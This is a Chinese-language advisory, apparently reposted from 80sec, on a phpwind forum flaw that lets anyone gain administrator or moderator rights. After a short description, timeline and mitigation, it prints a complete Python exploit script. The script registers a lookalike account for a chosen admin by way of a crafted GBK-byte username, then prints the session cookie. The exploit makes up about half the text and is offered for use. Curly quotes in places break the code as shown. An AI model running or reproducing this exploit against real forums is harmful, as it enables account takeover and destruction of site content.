phpwind管理权限泄露漏洞+利用程序

漏洞发布：http://www.80sec.com/
漏洞作者：jianxin@80sec.com
漏洞厂商： http://www.phpwind.com/ 本漏洞影响phpwind所有版本
漏洞危害：高
漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作

利用方式：http://www.80sec.com有提供exploit
漏洞分析：由于phpwind论坛在设计上对数据库存储机制不了解，导致在程序逻辑上判断有问题，用精心构造的数据注册用户即可获得管理权限
漏洞修补：建议关闭注册功能等待官方出补丁
漏洞状态：
08.5.25发现此漏洞
08.6.1由80sec.com公开此漏洞

暂无补丁

原始地址：http://www.80sec.com/release/phpwind-exploit.txt

漏洞测试：

以下是引用片段：
# -*- coding: gb2312 -*- 
import urllib2,httplib,sys 
httplib.HTTPConnection.debuglevel = 1 
cookies = urllib2.HTTPCookieProcessor() 
opener = urllib2.build_opener(cookies)  

def banner(): 
    print "" 
    print "########################################################" 
    print "Phpwind所有版本管理权限泄露漏洞利用poc" 
    print "Copyright (C) 2006" 
    print "jianxin@80sec.com" 
    print "80sec是一个新的致力于web安全的小团体" 
    print "http://www.80sec.com"  

def usage(): 
    banner() 
    print "Usage:\n" 
    print "   $ ./phpwind.py pwforumurl usertoattack\n" 
    print "   pwforumurl    目标论坛地址如http://www.80sec.com/" 
    print "   usertoattack    目标拥有权限的斑竹或管理员" 
    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户" 
    print "   最新版本可以使用uid登陆" 
    print "   其他版本可以使用cookie+useragent登陆" 
    print "########################################################" 
    print ""  

argvs=sys.argv 
usage()  

data = "regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=foo@foo.com&regemailtoall=1&step=2" % (argvs[2],”%c1″) 
pwurl = “%s/register.php” % argvs[1]  

request = urllib2.Request( 
    url     = pwurl , 
        headers = {’Content-Type’ : ‘application/x-www-form-urlencoded’,’User-Agent’: ’80sec owned this’}, 
        data    = data)  

f=opener.open(request) 
headers=f.headers.dict 
cookie=headers["set-cookie"] 
try: 
    if cookie.index(’winduser’): 
        print “Exploit Success!” 
        print “Login with uid password @80sec or Cookie:” 
        print cookie 
        print “User-agent: 80sec owned this” 
except: 
    print “Error! http://www.80sec.com” 
    print “Connect root#80sec.com”